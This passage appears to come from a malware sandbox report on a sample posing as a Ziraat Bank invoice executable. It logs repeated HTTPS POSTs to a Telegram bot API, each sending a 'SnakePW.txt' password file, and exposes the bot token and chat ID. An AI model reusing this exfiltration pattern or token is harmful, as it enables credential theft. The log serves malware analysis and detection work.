                                      2024-09-26 09:01:53 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 35 64 32 38 37 65 34 37 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0d5d287e471cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:53 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:53 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 31
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:53 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 31 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 31","parameters":{"retry_after":31}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      114192.168.2.449863149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:54 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0dae88b38925
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:54 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 61 65 38 38 62 33 38 39 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0dae88b38925Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:54 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:54 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 30
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:54 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 30 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 30","parameters":{"retry_after":30}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      115192.168.2.449864149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:54 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0dfe7e0ed492
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:54 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 66 65 37 65 30 65 64 34 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0dfe7e0ed492Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:55 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:55 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 29
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:55 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 39 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 29","parameters":{"retry_after":29}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      116192.168.2.449865149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:55 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0ffe117a5e37
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:55 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 66 65 31 31 37 61 35 65 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0ffe117a5e37Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:56 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:56 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 28
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:56 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 38 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 28","parameters":{"retry_after":28}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      117192.168.2.449866149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:56 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd10546c775586
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:56 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 35 34 36 63 37 37 35 35 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd10546c775586Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:57 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:57 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 27
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:57 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 37 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 37 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 27","parameters":{"retry_after":27}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      118192.168.2.449867149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:57 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd10bcc08ff78f
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:57 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 62 63 63 30 38 66 66 37 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd10bcc08ff78fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:58 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:58 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 26
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:58 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 36 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 26","parameters":{"retry_after":26}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      119192.168.2.449868149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:58 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd11117b97e492
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:58 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 31 31 37 62 39 37 65 34 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd11117b97e492Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:59 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:59 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 25
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:59 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 35 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 25","parameters":{"retry_after":25}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      120192.168.2.449869149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:59 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd1165e66f96a5
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:59 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 36 35 65 36 36 66 39 36 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd1165e66f96a5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:00 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:00 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 24
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:00 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 34 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 24","parameters":{"retry_after":24}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      121192.168.2.449870149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:00 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd11bbbd263db8
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:00 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 62 62 62 64 32 36 33 64 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd11bbbd263db8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:01 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:00 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 24
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:01 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 34 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 24","parameters":{"retry_after":24}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      122192.168.2.449871149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
